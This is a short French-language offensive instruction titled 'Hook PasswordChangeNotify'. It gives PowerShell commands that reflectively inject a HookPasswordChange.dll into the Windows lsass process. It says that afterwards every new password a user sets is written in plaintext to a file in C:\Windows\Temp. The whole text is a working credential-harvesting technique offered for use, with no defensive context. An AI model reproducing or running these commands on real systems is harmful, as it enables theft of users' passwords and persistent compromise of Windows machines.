
Hook PasswordChangeNotify
1、Exécutez la commande suivante dans powershell :
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
2、Lorsqu'un utilisateur de la machine cible modifie son mot de passe, le nouveau mot de passe sera écrit dans C:\Windows\Temp\passwords.txt